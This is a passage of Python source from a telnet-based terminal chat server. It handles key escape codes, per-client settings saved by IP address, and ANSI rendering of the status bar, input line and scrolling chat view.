self.add_esc(u"\x0d\x0a", "ret")
self.add_esc(u"\x0d\x00", "ret")
# inetutils-1.9.4
self.add_esc(u"\x7f", "bs") # this is DEL on windows-telnet
self.add_esc(u"\x1b\x4f\x48", "home")
self.add_esc(u"\x1b\x4f\x46", "end")
# debian 9.3
self.add_esc(u"\x1b\x5b\x48", "home")
self.add_esc(u"\x1b\x5b\x46", "end")
# putty
self.add_esc(u"\x1b\x5b\x33\x7e", "del")
# hotkeys
self.add_esc(u"\x12", "redraw")
self.add_esc(u"\x01", "prev-chan")
self.add_esc(u"\x18", "next-chan")
self.add_esc(u"\x05", "alt-tab")
thr = threading.Thread(target=self.handshake_timeout, name="hs_to")
thr.daemon = True
thr.start()
if IRONPY:
self.__eq__ = self.ipy__eq__
self.__ne__ = self.ipy__ne__
def ipy__eq__(self, other):
return id(self) == id(other)
def ipy__ne__(self, other):
return id(self) != id(other)
def default_config(self):
self.slowmo_tx = 0
self.y_input = 0 # offset from bottom of screen
self.y_status = 1 # offset from bottom of screen
self.linemode = False # set true by buggy clients
self.echo_on = False # set true by buffy clients
self.vt100 = True # set nope by butty clients
self.cnicks = False # colored nicknames
self.align = True # fixed left margin
self.bell = True # doot on hilights
self.crlf = u"\n" # return key
self.set_codec("utf-8")
def load_config(self):
load_ok = False
with self.world.mutex:
self.default_config()
self.user.client = self
self.user.admin = self.adr[0] == "127.0.0.1" # TODO
try:
(
ts,
nick,
slowmo,
linemode,
vt100,
echo_on,
crlf,
codec,
bell,
cnicks,
align,
) = self.host.user_config[self.adr[0]].split(u" ")
# print('],['.join([nick,linemode,vt100,echo_on,codec,bell]))
# terminal behavior
self.slowmo_tx = int(slowmo)
self.linemode = 1 == int(linemode)
self.vt100 = 1 == int(vt100)
self.echo_on = 1 == int(echo_on)
self.crlf = binascii.unhexlify(crlf).decode("utf-8")
self.set_codec(codec)
# user config
self.bell = 1 == int(bell)
self.cnicks = 1 == int(cnicks)
self.align = 1 == int(align)
if not self.world.find_user(nick):
self.user.set_nick(nick)
load_ok = True
except:
self.default_config()
if self.echo_on:
# if echo enabled, swap status and input:
# that way the screen won't scroll on enter
self.y_input = 1
self.y_status = 0
if not self.user.nick:
self.user.set_rand_nick()
return load_ok
def save_config(self):
with self.world.mutex:
conf_str = u" ".join(
[
hex(int(time.time() * 8.0))[2:].rstrip("L"),
self.user.nick,
# terminal behavior
unicode(self.slowmo_tx),
u"1" if self.linemode else u"0",
u"1" if self.vt100 else u"0",
u"1" if self.echo_on else u"0",
binascii.hexlify(self.crlf.encode("utf-8")).decode("utf-8"),
self.codec,
# user config
u"1" if self.bell else u"0",
u"1" if self.cnicks else u"0",
u"1" if self.align else u"0",
]
)
try:
if self.host.user_config[self.adr[0]] == conf_str:
return
except:
pass
self.host.user_config[self.adr[0]] = conf_str
self.host.user_config_changed = True
if self.echo_on:
self.y_input = 1
self.y_status = 0
def set_codec(self, codec_name):
multibyte = ["utf-8", "shift_jis"]
ff_illegal = ["utf-8", "shift_jis"]
self.codec = codec_name
self.multibyte_codec = self.codec in multibyte
self.inband_will_fail_decode = self.codec in ff_illegal
def reassign_retkey(self, crlf):
etab = self.esc_tab.iteritems if PY2 else self.esc_tab.items
drop = []
for key, value in etab():
if value == "ret" and key != u"\x0d\x00":
# \x0d \x00 gets special treatment because
# putty sends it for pastes but not keystrokes
# and it's unique enough to not cause any issues
drop.append(key)
for key in drop:
del self.esc_tab[key]
self.crlf = crlf
self.esc_tab[self.crlf] = "ret"
def determine_retkey(self, verify_only=False):
nline = b"\x0d\x0a\x00"
btext = self.in_text.encode("utf-8")
nl_a = next((i for i, ch in enumerate(btext) if ch in nline), None)
if nl_a is None:
return None
nl_b = None
for i, ch in enumerate(btext[nl_a:], nl_a):
if ch not in nline:
break
nl_b = i
if nl_b is not None:
nl = btext[nl_a : nl_b + 1]
crlf = nl.decode("utf-8")
if verify_only:
return self.crlf == crlf
self.reassign_retkey(crlf)
print(
"client crlf: {0} {1} {2}".format(
self.user.nick, self.adr[0], Util.b2hex(nl)
)
)
return nl_a
def set_term_size(self, w, h):
self.w = w
self.h = h
if self.ar.dbg:
print("terminal sz: {0}x{1}".format(self.w, self.h))
if self.w >= 512:
print("screen width {0} reduced to 80".format(self.w))
self.w = 80
if self.h >= 512:
print("screen height {0} reduced to 24".format(self.h))
self.h = 24
self.user.nick_len = len(self.user.nick)
if self.user.nick_len > self.w * 0.25:
self.user.nick_len = int(self.w * 0.25)
self.handshake_sz = True
def handshake_timeout(self):
if self.ar.dbg:
print("handshake_sz init")
time.sleep(1)
if self.ar.dbg:
if self.handshake_sz:
print("handshake_sz timeout")
else:
print("handshake_sz ok")
self.handshake_sz = True
def add_esc(self, key, act):
hist = u""
for c in key:
hist += c
if hist == key:
break
if hist in self.esc_tab and self.esc_tab[hist]:
raise RuntimeError(
"partial escape code [{0}] matching fully defined escape code for [{1}]".format(
Util.b2hex(hist), act
)
)
self.esc_tab[hist] = False
if key in self.esc_tab and self.esc_tab[key] != act:
raise RuntimeError(
"fully defined escape code [{0}] for [{1}] matches other escape code for [{2}]".format(
Util.b2hex(key), act, self.esc_tab[key]
)
)
self.esc_tab[key] = act
def request_terminal_size(self, scheduled_task=None):
if not self.vt100 or self.num_telnet_negotiations > 0:
# telnet got this covered,
# non-vt100 can't be helped
return False
self.pending_size_request = True
self.size_request_action = scheduled_task
self.say(b"\033[s\033[999;999H\033[6n\033[u")
if self.linemode:
self.say(
b"\033[H\033[J\r\n *** please press ENTER (due to linemode) ***\r\n\r\n "
)
def say(self, message):
self.outbox.put(message)
def readable(self):
return not self.dead
def writable(self):
# if not self.replies.empty() or self.backlog:
# print('REPLY!!')
# else:
# print('@' if self.backlog or not self.replies.empty() or not self.outbox.empty() else '.', end='')
# sys.stdout.flush()
# if self.slowmo_tx:
# #print('x')
# now = time.time()
# if self.last_tx is not None and now - self.last_tx < 0.01:
# return False
# #print('ooo')
# looks like we might end up here after all,
# TODO: safeguard against similar issues (thanks asyncore)
try:
return not self.dead and (
self.backlog or not self.replies.empty() or not self.outbox.empty()
)
except:
# terrible print-once guard
try:
self.crash_case_1 += 1
except:
self.crash_case_1 = 1
Util.whoops()
if not self.dead:
self.host.part(self)
def handle_close(self):
if not self.dead:
self.host.part(self)
def handle_error(self):
Util.whoops()
if not self.dead:
self.host.part(self)
def handle_write(self):
if not self.writable():
return
msg = self.backlog
self.backlog = b""
for src in [self.replies, self.outbox]:
while len(msg) < 480 and not src.empty():
msg += src.get()
if self.ar.hex_tx:
if len(msg) < self.ar.hex_lim:
Util.hexdump(msg, "<<--")
else:
print("<<-- : [{0} byte]".format(len(msg)))
if self.wire_log and self.ar.log_tx:
self.wire_log.write("{0:.0f}\n".format(time.time() * 1000).encode("utf-8"))
Util.hexdump(msg, "<", self.wire_log)
if self.slowmo_tx:
end_pos = next(
(
i
for i, ch in enumerate(msg)
if i >= 510 or (i > 480 and ch in [b" "[0], b"\033"[0]])
),
len(msg),
)
self.backlog = msg[end_pos:]
sent = self.socket.send(msg[:end_pos])
self.backlog = msg[sent:]
self.slowmo_skips = self.slowmo_tx
# hexdump(msg[:sent])
# print('@@@ sent = {0} backlog = {1}'.format(sent, len(self.backlog)))
else:
sent = self.socket.send(msg)
self.backlog = msg[sent:]
# print('@@@ sent = {0} backlog = {1}'.format(sent, len(self.backlog)))
def refresh(self, cursor_moved):
"""compose necessary ansi text and send to client"""
with self.world.mutex:
if (
self.too_small
or not self.handshake_sz
or not self.handshake_world
or self.wizard_stage is not None
):
return
if self.dead:
Util.whoops("refreshing dead client #wow #whoa")
try:
print("*** i am {0}".format(self.adr))
except:
pass
try:
print("*** i am [{0}]".format(self.user.nick))
except:
pass
if self in self.host.clients:
print("*** dead client still in host.clients")
def delayed_drop():
time.sleep(5)
if self in self.host.clients:
print("*** dead client STILL in host.clients, removing")
self.host.clients.remove(self)
self.world.cserial += 1
else:
print("*** its fine")
thr = threading.Thread(target=delayed_drop, name="dropcli")
thr.daemon = True
thr.start()
return
if not self.user:
Util.whoops("how did you get here without a user?")
return
if not self.user.active_chan and not self.user.new_active_chan:
Util.whoops(
"how did you get here without a chan? {0} {1}".format(
self.user.active_chan, self.user.new_active_chan
)
)
return
# full redraw if requested by anything stateful
full_redraw = self.need_full_redraw
self.need_full_redraw = False
# full redraw if the screen buffer has been invalidated
if not self.screen or len(self.screen) != self.h:
full_redraw = True
status_changed = False # set true to force status bar update
scroll_performed = False # scroll events might affect status bar
# switch to new channel,
# storing the last viewed message for notification purposes
if self.user.new_active_chan:
if self.user.active_chan:
self.user.active_chan.update_activity_flags(True)
self.user.old_active_chan = self.user.active_chan
self.user.active_chan = self.user.new_active_chan
self.user.active_chan.update_activity_flags(True)
self.user.new_active_chan = None
full_redraw = True
# check if user input has caused any unread messages
# in the active channel to be considered read
elif cursor_moved or self.scroll_cmd:
status_changed = self.user.active_chan.update_activity_flags(True)
if self.scroll_cmd:
# we don't know which messages will be displayed yet,
# schedule a recheck after message processing
scroll_performed = True
to_send = u""
fix_color = False
# invalidate screen buffer if full redraw
if full_redraw:
self.screen = ["x"] * self.h
if not self.vt100:
to_send = u"\r\n" * self.h
mark_messages_read = (
status_changed and not self.user.active_chan.display_notification
)
# update chat view
to_send += self.update_chat_view(full_redraw, mark_messages_read)
if to_send:
full_redraw = True
# update_chat_view computes which messages are visible
# once a scroll has completed, so we have to redo this
if scroll_performed:
if self.user.active_chan.update_activity_flags(True):
status_changed = True
if self.vt100:
# update top bar
to_send += self.update_top_bar(full_redraw)
# update status bar
if status_changed or not cursor_moved:
to_send += self.update_status_bar(full_redraw)
# anything sent so far would require an SGR reset
if to_send:
fix_color = True
else:
# always clear and resend the status bar for non-vt100
to_send += "\r" + (" " * 78) + "\r"
to_send += self.update_status_bar(True)
# handle keyboard strokes from non-linemode clients,
# but redraw text input field for linemode clients
to_send += self.update_text_input(full_redraw or self.echo_on)
# reset colours if necessary
if u"\033[" in self.linebuf or fix_color:
to_send += u"\033[0m"
# position cursor after CLeft/CRight/Home/End
if self.vt100 and (to_send or cursor_moved):
to_send += u"\033[{0};{1}H".format(
self.h - self.y_input,
self.user.nick_len + 2 + self.linepos + 1 - self.lineview,
)
# do it
if to_send:
self.say(to_send.encode(self.codec, "backslashreplace"))
def notify_new_hilight(self, uchan):
if uchan == self.user.active_chan:
return
# print('ping in {0} while in {1}'.format(uchan.nchan.get_name(), self.user.active_chan.nchan.get_name()))
if self.bell and len(uchan.nchan.uchans) > 1:
self.say(u"\x07".encode("utf-8"))
if self.show_hilight_tutorial:
self.show_hilight_tutorial = False
inf_u = self.user.chans[0]
inf_n = inf_u.nchan
cause = u""
if len(uchan.nchan.uchans) > 1:
ch_name = uchan.nchan.get_name()
if u" " in ch_name:
cause = u"\nsomeone sent you a private message.\n".format()
else:
cause = u"\nsomeone mentioned your nick in {0}.\n".format(ch_name)
self.world.send_chan_msg(
u"-nfo-",
inf_n,
u"""[about notifications]{0}
to jump through unread channels,
press CTRL-E or use the command /a
to disable audible alerts,
use the command /bn
""".format(
cause
),
)
self.user.new_active_chan = inf_u
self.refresh(False)
def update_top_bar(self, full_redraw):
"""no need to optimize this tbh"""
uchan = self.user.active_chan
nchan = uchan.nchan
topic = nchan.topic
if nchan.name is None:
title = uchan.alias
if uchan.alias == self.user.nick:
title += " (You) (why)"
else:
if len(uchan.nchan.uchans) < 2:
title += " (disconnected)"
topic = topic.replace(u"[[uch_a]]", title)
top_bar = u"\033[1H\033[44;48;5;235;38;5;220m{0}\033[K".format(topic)
if self.screen[0] != top_bar:
self.screen[0] = top_bar
return Util.trunc(top_bar, self.w)[0]
return u""
def update_status_bar(self, full_redraw):
preface = u"\033[{0}H\033[0;37;44;48;5;235m".format(self.h - self.y_status)
hhmmss = datetime.utcnow().strftime("%H%M%S")
uchan = self.user.active_chan
# print('@@@ active chan = {0}, other chans {1}'.format(
# self.user.active_chan.alias or self.user.active_chan.nchan.name,
# u', '.join(x.alias or x.nchan.name for x in self.user.chans)))
nbuf = self.user.chans.index(uchan)
nchan = uchan.nchan
chan_name = self.user.active_chan.nchan.name
chan_hash = u"#"
if chan_name is None:
# private chat
chan_hash = u"\033[1;37m"
chan_name = self.user.active_chan.alias
hilights = []
activity = []
for i, chan in enumerate(self.user.chans):
# print('testing {0} ({1}): h {2:1}, a {3:1}, dn {4:1}'.format(
# chan, chan.nchan.get_name(), chan.hilights, chan.activity, chan.display_notification))
if not chan.display_notification:
continue
if chan.hilights:
hilights.append(i)
if chan.activity:
activity.append(i)
if hilights:
hilights = u" \033[33mh:\033[1m{0}\033[22;39m".format(
u",".join(str(x) for x in hilights)
)
if activity:
activity = u" \033[32ma:\033[1m{0}\033[22;39m".format(
u",".join(str(x) for x in activity)
)
offscreen = None
if not uchan.lock_to_bottom and uchan.vis[-1].im < len(nchan.msgs):
offscreen = u" \033[1;36m+{0}\033[22;39m".format(
len(nchan.msgs) - uchan.vis[-1].im
)
line = Util.trunc(
u"{0}{1} {2}: {3}{4}{5}{6}{7}\033[K".format(
preface,
hhmmss,
nbuf,
chan_hash,
chan_name,
offscreen or u"",
hilights or u"",
activity or u"",
),
self.w,
)[0]
if not self.vt100:
now = int(time.time())
ret = u""
if (
full_redraw
or (now % 5 == 1)
or ((hilights or activity) and now % 2 == 1)
):
ret = u"\r{0} {1}> ".format(Util.strip_ansi(line), self.user.nick)
self.left_chrome = ret
return ret
elif full_redraw:
if self.screen[self.h - (self.y_status + 1)] != line:
self.screen[self.h - (self.y_status + 1)] = line
return Util.trunc(line, self.w)[0]
else:
old = self.screen[self.h - (self.y_status + 1)]
self.screen[self.h - (self.y_status + 1)] = line
if len(old) != len(line):
return Util.trunc(line, self.w)[0]
cutoff = len(preface) + len(hhmmss)
changed_part1 = old[:cutoff] != line[:cutoff]
changed_part2 = old[cutoff:] != line[cutoff:]
if changed_part2:
# send all of it
return Util.trunc(line, self.w)[0]
if changed_part1:
if int(time.time()) % 5 == 0:
# send just the timestamp
return line[:cutoff]
return u""
def compute_lineview(self, free_space, chi, ansi):
# ensure at least 1/3 of the available space is
# dedicated to text on the left side of the cursor
left_margin = int(free_space * 0.334)
if self.linepos - self.lineview < left_margin:
self.lineview = self.linepos - left_margin
if self.lineview < 0:
self.lineview = 0
# cursor is beyond right side of screen
elif self.linepos > self.lineview + free_space:
self.lineview = self.linepos - free_space
# text is partially displayed,
# but cursor is not sufficiently far to the right
midways = int(free_space * 0.5)
if self.lineview > 0 and len(chi) - self.lineview < midways:
self.lineview = len(chi) - midways
if self.lineview < 0:
# not sure if this could actually happen
# but the test is cheap enough so might as well
self.lineview = 0
start = 0
if self.lineview > 0:
# lineview is the first visible character to display,
# we want to include any colour codes that precede it
# so start from character lineview-1 into the ansi text
try:
start = chi[self.lineview - 1] + 1
except:
# seen in the wild, likely caused by that one guy with
# the stupidly long nickname; adding this just in case
Util.whoops("IT HAPPENED")
print("user = {0}".format(self.user.nick))
try:
n = self.user.active_chan.nchan.get_name()
print("chan = {0}".format(n))
except:
pass
print("linepos = " + str(self.linepos))
print("lineview = " + str(self.lineview))
print("chi = " + ",".join([str(x) for x in chi]))
print("line = " + Util.b2hex(self.linebuf.encode("utf-8")))
print("termsize = " + str(self.w) + "x" + str(self.h))
print("free_spa = " + str(free_space))
print("-" * 72)
# reset to sane defaults
self.lineview = 0
start = 0
end = len(ansi)
if self.lineview + free_space < len(chi) - 1: # off-by-one?
# no such concerns about control sequences after the last
# visible character; just don't read past the end of chi
end = chi[self.lineview + free_space]
return ansi[start:end]
def update_text_input(self, full_redraw):
if not self.vt100:
# cant believe this works
free_space = 72 - len(self.left_chrome)
p1 = self.linebuf[: self.linepos]
p2 = self.linebuf[self.linepos :]
ansi = Util.convert_color_codes(p1 + u"█" + p2, True)
chi = Util.visual_indices(ansi)
ret = self.compute_lineview(free_space, chi, ansi)
return Util.strip_ansi(ret)
if not full_redraw and not self.linebuf and self.linemode:
return u""
line_fmt = u"\033[0;36m{0}>\033[0m {1}"
print_fmt = u"\033[{0}H{1}\033[K"
if self.pending_size_request:
line = line_fmt.format(
self.user.nick[: self.user.nick_len],
u"#\033[7m please press ENTER (due to linemode) \033[0m",
)
if self.screen[self.h - (self.y_input + 1)] != line or full_redraw:
self.screen[self.h - (self.y_input + 1)] = line
return print_fmt.format(self.h - self.y_input, line)
return u""
if "\x0b" in self.linebuf or "\x0f" in self.linebuf:
ansi = Util.convert_color_codes(self.linebuf, True)
chi = Util.visual_indices(ansi)
else:
ansi = self.linebuf
chi = list(range(len(ansi)))
# nick chrome + final char on screen
free_space = self.w - (self.user.nick_len + 2 + 1)
if len(chi) <= free_space:
self.lineview = 0
else:
ansi = self.compute_lineview(free_space, chi, ansi)
if u"\033" in ansi:
# reset colours if the visible segment contains any
ansi += u"\033[0m"
line = line_fmt.format(self.user.nick[: self.user.nick_len], ansi)
if self.screen[self.h - (self.y_input + 1)] != line or full_redraw:
self.screen[self.h - (self.y_input + 1)] = line
return print_fmt.format(self.h - self.y_input, line)
return u""
def msg2ansi(self, msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w):
ts = datetime.utcfromtimestamp(msg.ts).strftime(ts_fmt)
txt = []
for ln in [x.rstrip() for x in msg.txt.split("\n")]:
if len(ln) < msg_w or Util.visual_length(ln) < msg_w:
txt.append(ln)
else:
txt.extend(Util.wrap(ln.rstrip(), msg_w, msg_w2))
for n, line in enumerate(txt):
if u"\033" in line:
if self.vt100:
line += u"\033[0m"
else:
line = Util.strip_ansi(line)
if n == 0:
c1 = u""
c2 = u""
if self.vt100:
c1 = u"\033[1m"
c2 = u"\033[0m"
if msg.user == u"-nfo-":
c1 = u"\033[0;32m"
elif msg.user == u"-err-":
c1 = u"\033[1;33m"
elif msg.user == u"***":
c1 = u"\033[36m"
elif msg.user != u"--" and self.cnicks:
try:
c1 = self.world.cntab[msg.user]
except:
crc = zlib.crc32(msg.user.encode("utf-8")) & 0xFFFFFFFF
c1 = Util.BRI_256[crc % len(Util.BRI_256)]
c1 = u"\033[1;48;5;16;38;5;{0}m".format(c1)
self.world.cntab[msg.user] = c1
txt[n] = msg_fmt.format(ts, c1, msg.user[:nick_w], c2, line)
else:
txt[n] = msg_nl + line
return txt
def update_chat_view(self, full_redraw, mark_messages_read, call_depth=0):
ch = self.user.active_chan
nch = ch.nchan
ret = u""
if call_depth > 3:
# the famous "should never happen"
Util.whoops("ch={0} usr={1}".format(nch.get_name(), self.user.nick))
return None
debug_scrolling = False
nick_w = None
if self.user.active_chan.alias == u"r0c-status":
nick_w = 6
if self.w >= 140:
nick_w = nick_w or 18
msg_w = self.w - (nick_w + 11)
msg_nl = u" " * (nick_w + 11)
ts_fmt = "%H:%M:%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 100:
nick_w = nick_w or 14
msg_w = self.w - (nick_w + 11)
msg_nl = u" " * (nick_w + 11)
ts_fmt = "%H:%M:%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 80:
nick_w = nick_w or 12
msg_w = self.w - (nick_w + 8)
msg_nl = u" " * (nick_w + 8)
ts_fmt = "%H%M%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 60:
nick_w = nick_w or 8
msg_w = self.w - (nick_w + 7)
msg_nl = u" " * (nick_w + 7)
ts_fmt = "%H:%M"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
else:
nick_w = nick_w or 8
msg_w = self.w - (nick_w + 1)
msg_nl = u" " * (nick_w + 1)
ts_fmt = "%H%M"
msg_fmt = u"{{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
if self.align:
msg_w2 = msg_w
else:
msg_w2 = self.w - 2
msg_nl = u" "
# first ensure our cache is sane
if not ch.vis:
self.scroll_cmd = None
ch.lock_to_bottom = True
full_redraw = True
else:
if len(nch.msgs) <= ch.vis[0].im or nch.msgs[ch.vis[0].im] != ch.vis[0].msg:
try:
# some messages got pruned from the channel message list
if len(nch.msgs) <= ch.vis[0].im:
print(
"\033[1;33mcache inval: [{0}] in [{1}], |{2}| <= {3}\033[0m".format(
ch.user.nick,
nch.get_name(),
len(nch.msgs),
ch.vis[0].im,
)
)
else:
print(
"\033[1;33mcache inval: [{0}] in [{1}], #{2} <= #{3}\033[0m".format(
ch.user.nick,
nch.get_name(),
nch.msgs[ch.vis[0].im].sno,
ch.vis[0].msg.sno,
)
)
im0 = nch.msgs.index(ch.vis[0].msg)
for n, vis in enumerate(ch.vis):
vis.im = n + im0
except:
# the pruned messages included the visible ones,
# scroll client to bottom
print(
"\033[1;33mviewport NG: [{0}] in [{1}]\033[0m".format(
ch.user.nick, nch.get_name()
)
)
self.scroll_cmd = None
ch.lock_to_bottom = True
full_redraw = True
# we get painfully slow on join/parts when the
# channel has more than 800 messages or so
#
# thanks stress.py
if (
ch.lock_to_bottom
and not full_redraw
and nch.msgs[-1].sno - ch.vis[-1].msg.sno > self.h * 2
):
# lots of messages since last time, no point in scrolling
self.scroll_cmd = None
full_redraw = True
if full_redraw:
if self.scroll_cmd:
# all the scrolling code assumes a gradual refresh,
# this is cheap enough to almost be defendable
self.update_chat_view(False, False, call_depth + 1)
lines = []
lines_left = self.h - 3
if not ch.lock_to_bottom:
# fixed scroll position:
# oldest/top message will be added first
top_msg = ch.vis[0]
imsg = top_msg.im
ch.vis = []
for n, msg in enumerate(nch.msgs[imsg : imsg + self.h - 3]):
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
if top_msg is not None and len(top_msg.txt) == len(txt):
car = top_msg.car
cdr = len(top_msg.txt)
n_vis = cdr - car
top_msg = None
if n_vis > lines_left:
delta = n_vis - lines_left
n_vis -= delta
cdr -= delta
else:
# not top message,
# or no previous top message to compare,
# or layout changed
n_vis = len(txt)
car = 0
cdr = n_vis
if n_vis > lines_left:
n_vis = lines_left
cdr = n_vis
if cdr > len(txt) or car >= cdr or n_vis == 0:
print("bug1 car{0} cdr{1} len{2}".format(car, cdr, len(txt)))
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, car, cdr, ch)
ch.vis.append(vmsg)
for ln in vmsg.txt[car:cdr]:
lines.append(ln)
imsg += 1
lines_left -= n_vis
if lines_left <= 0:
break
if lines_left > 0 and ch.vis[0].msg != nch.msgs[0]:
# we didn't manage to fill the screen,
# TODO: go above vis[0] rather than cheat
ret = u""
lines = []
lines_left = self.h - 3
ch.lock_to_bottom = True
if ch.lock_to_bottom:
# lock to bottom, full redraw:
# newest/bottom message will be added first
ch.vis = []
for n, msg in enumerate(reversed(nch.msgs)):
imsg = (len(nch.msgs) - 1) - n
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
n_vis = len(txt)
car = 0
cdr = n_vis
if n_vis >= lines_left:
n_vis = lines_left
car = cdr - n_vis
if cdr > len(txt) or car >= cdr or n_vis == 0:
print("bug2 car{0} cdr{1} len{2}".format(car, cdr, len(txt)))
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, car, cdr, ch)
ch.vis.append(vmsg)
for ln in reversed(vmsg.txt[car:]):
lines.append(ln)
lines_left -= n_vis
if lines_left <= 0:
break
ch.vis.reverse()
lines.reverse()
if not self.vt100:
# ret = u'\r==========================\r\n'
# print(lines)
for ln in lines:
# print('sending {0} of {1}'.format(ln, len(lines)))
# if isinstance(lines, list):
# print('lines is list')
ret += u"\r{0}{1}\r\n".format(ln, u" " * ((self.w - len(ln)) - 2))
return ret
while len(lines) < self.h - 3:
lines.append(u"--")
for n in range(self.h - 3):
self.screen[n + 1] = lines[n]
ret += u"\033[{0}H\033[K{1}".format(n + 2, self.screen[n + 1])
else:
# full_redraw = False,
# do relative scrolling if necessary
t_steps = self.scroll_cmd # total number of scroll steps
n_steps = 0 # number of scroll steps performed
self.scroll_cmd = None
lines_in_use = 0
for msg in ch.vis:
lines_in_use += msg.cdr - msg.car
if t_steps:
# print('@@@ have scroll steps')
ch.lock_to_bottom = False
else:
# print('@@@ no scroll steps')
if not ch.lock_to_bottom:
# fixed viewport
# print('@@@ not lock to bottom')
return ret
if nch.msgs[-1] == ch.vis[-1].msg and not mark_messages_read:
# no new messages
# print('@@@ no new messages: {0}'.format(ch.vis[-1].txt[0][:40]))
return ret
# push all new messages
t_steps = 99999999999
abs_steps = abs(t_steps) # abs(total steps)
# print('@@@ gonna scroll {0} lines'.format(abs_steps))
# for msg in ch.vis:
# for ln in msg.txt[msg.car : msg.cdr]:
# print(ln)
# set scroll region: chat pane
if self.vt100:
ret += u"\033[2;{0}r".format(self.h - 2)
# first / last visible message might have lines off-screen;
# check those first
partial = None # currently offscreen text
partial_org = None # unmodified original
partial_old = None # currently visible segment
partial_new = None # currently invisible segment
# scrolling up; grab offscreen text at top
if t_steps < 0:
ref = ch.vis[0]
if ref.car != 0:
partial = Chat.VisMessage().c_segm(ref, 0, ref.car, 0, ref.car, ch)
partial_org = ref
partial_old = Chat.VisMessage().c_segm(
ref, ref.car, ref.cdr, 0, ref.cdr - ref.car, ch
)
ch.vis[0] = partial_old
if debug_scrolling:
print(
"@@@ slicing len({0}) car,cdr({1},{2}) into nlen({3})+olen({4}), ncar,ncdr({5},{6})? ocar,ocdr({7},{8})".format(
len(partial_org.txt),
partial_org.car,
partial_org.cdr,
len(partial.txt),
len(partial_old.txt),
0,
len(partial.txt),
partial_old.car,
partial_old.cdr,
)
)
for ln in partial.txt:
print(ln, "+new")
for ln in partial_old.txt:
print(ln, "---old")
else:
ref = ch.vis[-1]
if ref.cdr != len(ref.txt):
if debug_scrolling:
for n, ln in enumerate(ref.txt):
if n == ref.car:
anchor = "== car"
elif n == ref.cdr - 1:
anchor = "== cdr"
else:
anchor = ""
print(
"{0:2} {1} {2}".format(
n,
ln,
anchor,
)
)
if ref.cdr > len(ref.txt) or ref.car >= ref.cdr:
print(
"bug3 car{0} cdr{1} len{2}".format(
ref.car, ref.cdr, len(ref.txt)
)
)
partial = Chat.VisMessage().c_segm(
ref, ref.cdr, len(ref.txt), 0, len(ref.txt) - ref.cdr, ch
)
partial_org = ref
partial_old = Chat.VisMessage().c_segm(
ref, ref.car, ref.cdr, 0, ref.cdr - ref.car, ch
)
ch.vis[-1] = partial_old
if debug_scrolling:
print(
"@@@ slicing len({0}) car,cdr({1},{2}) into olen({3})+nlen({4}), ocar,ocdr({5},{6}) ncar,ncdr({7},{8})?".format(
len(partial_org.txt),
partial_org.car,
partial_org.cdr,
len(partial_old.txt),
len(partial.txt),
partial_old.car,
partial_old.cdr,
0,
len(partial.txt),
)
)
for ln in partial_old.txt:
print(ln, "---old")
for ln in partial.txt:
print(ln, "+new")
# get message offset to start from
if t_steps < 0:
imsg = ch.vis[0].im
else:
imsg = ch.vis[-1].im
if debug_scrolling:
print(
"@@@ num chan messages {0}, num vis messages {1}, retained {2} = {3}".format(
len(nch.msgs), len(ch.vis), imsg, nch.msgs[imsg].txt[:6]
)
)
dbg = ""
for m in ch.vis:
dbg += "{0}, ".format(m.im)
print("@@@ {0}".format(dbg))
# scroll until n_steps reaches abs_steps
while n_steps < abs_steps:
vmsg = None
if partial:
vmsg = partial
else:
if t_steps < 0:
imsg -= 1
if imsg < 0:
break
else:
imsg += 1
if imsg >= len(nch.msgs):
break
msg = nch.msgs[imsg]
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, 0, len(txt), ch)
txt = vmsg.txt
msg = vmsg.msg
if t_steps < 0:
txt_order = reversed(txt)
else:
txt_order = txt
# write lines to send buffer
n_vis = 0
for ln in txt_order:
# print(u'@@@ vis{0:2} stp{1:2} += {2}'.format(n_vis, n_steps, ln))
if not self.vt100:
ret += u"\r{0}{1}\r\n".format(
ln, u" " * ((self.w - len(ln)) - 2)
)
elif lines_in_use < self.h - 3:
ret += u"\033[{0}H\033[K{1}".format(lines_in_use + 2, ln)
lines_in_use += 1
elif t_steps > 0:
# official way according to docs,
# doesn't work in windows terminals (xp..win10)
# ret += u'\033[{0}H\033[S\033[K{1}'.format(self.h - 2, ln)
# stopped working in WSL1 terminals on LTSC 2020-09
# ret += u"\033[{0}H\033D\033[K{1}".format(self.h - 2, ln)
# ok
ret += u"\033[{0}H\n\n\033[K{1}".format(self.h - 3, ln)
else:
# official way according to docs,
# doesn't work on inetutils-1.9.4
# ret += u'\033[2H\033[T\033[K{0}'.format(ln)
# also works
ret += u"\033[2H\033M\033[K{0}".format(ln)
n_vis += 1
n_steps += 1
if n_steps >= abs_steps:
break
if t_steps < 0:
new_cdr = len(txt)
new_car = new_cdr - n_vis
else:
new_car = 0
new_cdr = n_vis
vmsg.car = new_car
vmsg.cdr = new_cdr
# print('@@@ vismsg len({0}) car,cdr({1},{2}) -- {3}'.format(len(txt), new_car, new_cdr, txt[0][-30:]))
if vmsg.cdr > len(vmsg.txt) or vmsg.car >= vmsg.cdr or n_vis == 0:
print(
"bug4 car{0} cdr{1} len{2}".format(
vmsg.car, vmsg.cdr, len(vmsg.txt)
)
)
if t_steps < 0:
ch.vis.insert(0, vmsg)
else:
ch.vis.append(vmsg)
if partial:
partial = None
partial_new = vmsg
# release scroll region
if self.vt100:
ret += u"\033[r"
# trim away messages that went off-screen
if t_steps < 0:
vis_order = ch.vis
else:
vis_order = reversed(ch.vis)
n_msg = 0
ln_left = self.h - 3
for i, vmsg in enumerate(vis_order):
if ln_left <= 0:
break
n_msg += 1
msg_sz = vmsg.cdr - vmsg.car
if msg_sz >= ln_left:
